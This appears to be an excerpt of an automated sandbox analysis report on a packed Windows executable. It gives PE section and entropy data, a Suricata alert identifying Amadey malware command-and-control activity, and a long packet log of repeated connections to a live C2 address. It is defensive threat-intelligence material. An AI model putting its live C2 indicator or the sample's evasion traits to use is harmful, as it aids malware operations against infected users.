IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c0088	0x10	mrrxutca
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4c0038	0x18	mrrxutca
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	ed7289e809c111fbbe014486db28e97c	False	0.9973284230245232	data	7.983894166340195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	ef382bab74351570966c8da914054ece	False	0.578125	data	4.4738715334426225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2b0000	0x200	6cfee164066ca635194da20dc4e0bbfb	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mrrxutca	0x31b000	0x1a6000	0x1a5400	0cf5296dfb6aec9123f5480bd7c96406	False	0.9943481083086053	OpenPGP Public Key	7.952707462434755	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gmpmgtcb	0x4c1000	0x1000	0x600	4e0d628877364b8938625c0e75fa7332	False	0.587890625	data	5.149175714628264	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4c2000	0x3000	0x2200	f33e5e100be18ce6c6c1a3c7f55b0e64	False	0.07582720588235294	DOS executable (COM)	0.954469128055802	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4c0098	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T07:02:52.454598+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.8	49756	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 07:02:04.647201061 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:04.652025938 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:04.652093887 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:04.652661085 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:04.657399893 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:05.371542931 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:05.374419928 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:05.431461096 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:05.436281919 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:05.663382053 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:05.663480043 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:05.858952999 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:05.859642982 CEST	49712	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:05.864180088 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:05.864629984 CEST	80	49712	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:05.864694118 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:05.864726067 CEST	49712	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:05.903161049 CEST	49712	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:05.909313917 CEST	80	49712	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:06.568217039 CEST	80	49712	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:06.568294048 CEST	49712	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:06.569134951 CEST	49712	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:06.574170113 CEST	80	49712	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:06.797986984 CEST	80	49712	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:06.798077106 CEST	49712	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:06.912457943 CEST	49712	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:06.912790060 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:06.917676926 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:06.917718887 CEST	80	49712	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:06.917749882 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:06.917783976 CEST	49712	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:06.918184996 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:06.922970057 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:07.612451077 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:07.612523079 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:07.613982916 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:07.618736029 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:07.836779118 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:07.836889029 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:07.943743944 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:07.944190979 CEST	49714	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:07.948909998 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:07.948976994 CEST	80	49714	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:07.949011087 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:07.949069023 CEST	49714	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:07.949237108 CEST	49714	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:07.953990936 CEST	80	49714	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:08.647757053 CEST	80	49714	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:08.647948980 CEST	49714	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:08.649630070 CEST	49714	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:08.654359102 CEST	80	49714	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:08.873267889 CEST	80	49714	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:08.873480082 CEST	49714	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:08.975327969 CEST	49714	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:08.976113081 CEST	49715	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:08.980321884 CEST	80	49714	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:08.980405092 CEST	49714	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:08.980901003 CEST	80	49715	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:08.981012106 CEST	49715	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:08.981189966 CEST	49715	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:08.985913992 CEST	80	49715	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:09.708692074 CEST	80	49715	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:09.708813906 CEST	49715	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:09.709614038 CEST	49715	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:09.714503050 CEST	80	49715	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:09.943667889 CEST	80	49715	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:09.943748951 CEST	49715	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:10.056835890 CEST	49715	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:10.057558060 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:10.061851978 CEST	80	49715	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:10.061923027 CEST	49715	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:10.062494040 CEST	80	49716	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:10.062573910 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:10.064166069 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:10.068928957 CEST	80	49716	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:10.771675110 CEST	80	49716	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:10.771756887 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:10.772545099 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:10.777369976 CEST	80	49716	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:11.004168034 CEST	80	49716	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:11.004323006 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:11.115842104 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:11.116430044 CEST	49717	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:11.120959044 CEST	80	49716	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:11.121105909 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:11.121193886 CEST	80	49717	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:11.121360064 CEST	49717	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:11.121480942 CEST	49717	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:11.126224995 CEST	80	49717	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:11.815941095 CEST	80	49717	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:11.816016912 CEST	49717	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:11.816812992 CEST	49717	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:11.821594000 CEST	80	49717	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:12.040062904 CEST	80	49717	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:12.040174961 CEST	49717	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:12.147083044 CEST	49717	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:12.147793055 CEST	49718	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:12.154828072 CEST	80	49717	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:12.154922009 CEST	49717	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:12.155798912 CEST	80	49718	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:12.155889034 CEST	49718	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:12.156254053 CEST	49718	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:12.161088943 CEST	80	49718	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:12.865134001 CEST	80	49718	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:12.865225077 CEST	49718	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:12.866034985 CEST	49718	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:12.870866060 CEST	80	49718	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:13.095765114 CEST	80	49718	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:13.095824957 CEST	49718	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:13.211308002 CEST	49718	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:13.211642027 CEST	49719	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:13.216360092 CEST	80	49718	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:13.216449022 CEST	49718	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:13.216475010 CEST	80	49719	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:13.216547012 CEST	49719	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:13.216696024 CEST	49719	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:13.221451044 CEST	80	49719	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:13.915076971 CEST	80	49719	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:13.915189981 CEST	49719	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:13.915976048 CEST	49719	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:13.920681000 CEST	80	49719	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:14.141984940 CEST	80	49719	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:14.142334938 CEST	49719	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:14.256347895 CEST	49719	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:14.256753922 CEST	49720	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:14.261631966 CEST	80	49720	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:14.261699915 CEST	49720	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:14.261881113 CEST	49720	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:14.261898041 CEST	80	49719	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:14.262001991 CEST	49719	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:14.266654015 CEST	80	49720	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:15.005763054 CEST	80	49720	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:15.005942106 CEST	49720	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:15.007226944 CEST	49720	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:15.012063026 CEST	80	49720	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:15.240976095 CEST	80	49720	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:15.241075039 CEST	49720	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:15.349966049 CEST	49720	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:15.350303888 CEST	49721	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:15.354964972 CEST	80	49720	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:15.355053902 CEST	49720	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:15.355129004 CEST	80	49721	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:15.355200052 CEST	49721	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:15.355390072 CEST	49721	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:15.360131025 CEST	80	49721	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:16.061007023 CEST	80	49721	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:16.061089993 CEST	49721	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:16.061783075 CEST	49721	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:16.066622019 CEST	80	49721	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:16.292433977 CEST	80	49721	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:16.292570114 CEST	49721	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:16.397804022 CEST	49721	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:16.398226976 CEST	49722	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:16.403076887 CEST	80	49721	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:16.403152943 CEST	49721	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:16.403695107 CEST	80	49722	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:16.403775930 CEST	49722	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:16.403985977 CEST	49722	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:16.408760071 CEST	80	49722	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:17.097100019 CEST	80	49722	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:17.097274065 CEST	49722	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:17.098262072 CEST	49722	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:17.103082895 CEST	80	49722	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:17.322303057 CEST	80	49722	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:17.322391987 CEST	49722	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:17.428248882 CEST	49722	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:17.428666115 CEST	49724	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:17.433304071 CEST	80	49722	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:17.433410883 CEST	49722	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:17.433630943 CEST	80	49724	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:17.433804989 CEST	49724	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:17.433954954 CEST	49724	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:17.438788891 CEST	80	49724	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:18.136229992 CEST	80	49724	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:18.136406898 CEST	49724	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:18.137312889 CEST	49724	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:18.150564909 CEST	80	49724	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:18.360410929 CEST	80	49724	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:18.360553980 CEST	49724	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:18.475557089 CEST	49724	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:18.475640059 CEST	49725	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:18.480397940 CEST	80	49725	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:18.480494976 CEST	49725	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:18.480509043 CEST	80	49724	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:18.480576992 CEST	49724	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:18.480709076 CEST	49725	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:18.485443115 CEST	80	49725	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:19.215290070 CEST	80	49725	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:19.216089964 CEST	49725	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:19.217108965 CEST	49725	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:19.221893072 CEST	80	49725	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:19.451111078 CEST	80	49725	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:19.452127934 CEST	49725	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:19.553133011 CEST	49725	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:19.553421021 CEST	49726	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:19.558259010 CEST	80	49726	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:19.558274031 CEST	80	49725	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:19.558363914 CEST	49725	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:19.558363914 CEST	49726	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:19.558619022 CEST	49726	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:19.563431025 CEST	80	49726	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:20.277343035 CEST	80	49726	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:20.277414083 CEST	49726	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:20.278129101 CEST	49726	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:20.282978058 CEST	80	49726	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:20.508101940 CEST	80	49726	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:20.508188963 CEST	49726	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:20.615797043 CEST	49726	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:20.616194963 CEST	49727	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:20.620834112 CEST	80	49726	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:20.620969057 CEST	49726	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:20.621117115 CEST	80	49727	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:20.621248007 CEST	49727	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:20.621521950 CEST	49727	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:20.626296997 CEST	80	49727	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:21.338819027 CEST	80	49727	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:21.338937044 CEST	49727	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:21.339728117 CEST	49727	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:21.344512939 CEST	80	49727	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:21.569061041 CEST	80	49727	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:21.569200039 CEST	49727	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:21.680131912 CEST	49727	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:21.680413961 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:21.685199022 CEST	80	49728	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:21.685246944 CEST	80	49727	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:21.685324907 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:21.685369968 CEST	49727	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:21.685508966 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:21.690252066 CEST	80	49728	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:22.383748055 CEST	80	49728	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:22.383894920 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:22.385257959 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:22.390026093 CEST	80	49728	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:22.611278057 CEST	80	49728	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:22.611344099 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:22.725208044 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:22.725534916 CEST	49729	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:22.730667114 CEST	80	49728	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:22.730773926 CEST	49728	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:22.730906963 CEST	80	49729	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:22.731000900 CEST	49729	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:22.731244087 CEST	49729	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:22.736112118 CEST	80	49729	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:23.429603100 CEST	80	49729	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:23.429714918 CEST	49729	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:23.430541039 CEST	49729	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:23.435332060 CEST	80	49729	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:23.848789930 CEST	80	49729	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:23.848872900 CEST	49729	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:23.959508896 CEST	49729	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:23.959852934 CEST	49730	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:23.964595079 CEST	80	49729	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:23.964623928 CEST	80	49730	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:23.964715958 CEST	49729	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:23.964772940 CEST	49730	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:23.965017080 CEST	49730	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:23.969769001 CEST	80	49730	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:24.662756920 CEST	80	49730	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:24.662857056 CEST	49730	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:24.663634062 CEST	49730	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:24.668421984 CEST	80	49730	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:24.896445990 CEST	80	49730	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:24.896543026 CEST	49730	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:25.010143995 CEST	49730	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:25.014451027 CEST	49731	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:25.015194893 CEST	80	49730	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:25.015271902 CEST	49730	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:25.019305944 CEST	80	49731	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:25.019395113 CEST	49731	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:25.019562006 CEST	49731	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:25.024324894 CEST	80	49731	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:25.718122005 CEST	80	49731	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:25.718187094 CEST	49731	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:25.719909906 CEST	49731	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:25.725919008 CEST	80	49731	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:25.948371887 CEST	80	49731	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:25.948487997 CEST	49731	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:26.053394079 CEST	49731	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:26.054064989 CEST	49732	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:26.058394909 CEST	80	49731	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:26.058516026 CEST	49731	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:26.058964014 CEST	80	49732	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:26.059314966 CEST	49732	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:26.059314966 CEST	49732	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:26.064136982 CEST	80	49732	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:26.789566994 CEST	80	49732	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:26.789696932 CEST	49732	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:26.790895939 CEST	49732	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:26.795717001 CEST	80	49732	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:27.028249025 CEST	80	49732	185.215.113.16	192.168.2.8
Sep 27, 2024 07:02:27.028372049 CEST	49732	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:02:27.131710052 CEST	49732	80	192.168.2.8	185.215.113.16
